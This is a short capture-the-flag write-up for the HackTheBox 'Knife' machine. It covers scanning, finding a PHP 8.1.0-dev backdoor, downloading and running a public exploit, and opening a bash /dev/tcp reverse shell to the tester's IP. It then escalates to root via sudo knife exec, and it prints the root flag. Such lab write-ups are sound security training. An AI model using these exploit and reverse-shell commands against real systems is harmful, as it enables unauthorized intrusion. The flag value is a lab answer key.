HackTheBox - Knife - writeup

HackTheBox - Knife - writeup

·

1 min read

Meta Data

IP: 10.129.190.120 Date accessed: 08/18/2021

Scanning

80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
  • Navigate to the website

  • View page source

"https://cpwebassets.codepen.io/assets/common/stopExecutionOnTimeout-157cd5b220a5c80d4ff8e0e70ac069bffd87a61252088146915e8726e5d9f147.js
  • Inspect Element > Network > GET request
X-Powered-By
    PHP/8.1.0-dev

Exploits

Recent exploit

  • wget https://packetstormsecurity.com/files/download/162749/php_8.1.0-dev.py.txt -O exploit.py
python3 exploit.py -u http://10.129.190.120/ -c "id"
[+] Results:
uid=1000(james) gid=1000(james) groups=1000(james)
  • set up netcat
python3 exploit.py -u http://10.129.190.120/ -c "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.94/4444 0>&1'"
root@kali-virtualbox:~/GitLab/Offensive-Security/HackTheBox/Knife# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.94] from (UNKNOWN) [10.129.190.120] 33542
bash: cannot set terminal process group (875): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$ 
james@knife:/$ sudo knife exec -E "system('/bin/sh -i')"
sudo knife exec -E "system('/bin/sh -i')"
/bin/sh: 0: can't access tty; job control turned off
# pwd
/
# whoami
root

Stabilizing shell

# python3 -d 'import pty; pty.spawn("/bin/bash")'
python3: can't open file 'import pty; pty.spawn("/bin/bash")': [Errno 2] No such file or directory
# pwd
/
# cd root    
# pwd
/root
# ls
delete.sh
root.txt
snap
# cat root.txt
2fc175c72e72f7a880fdb29a79051267
#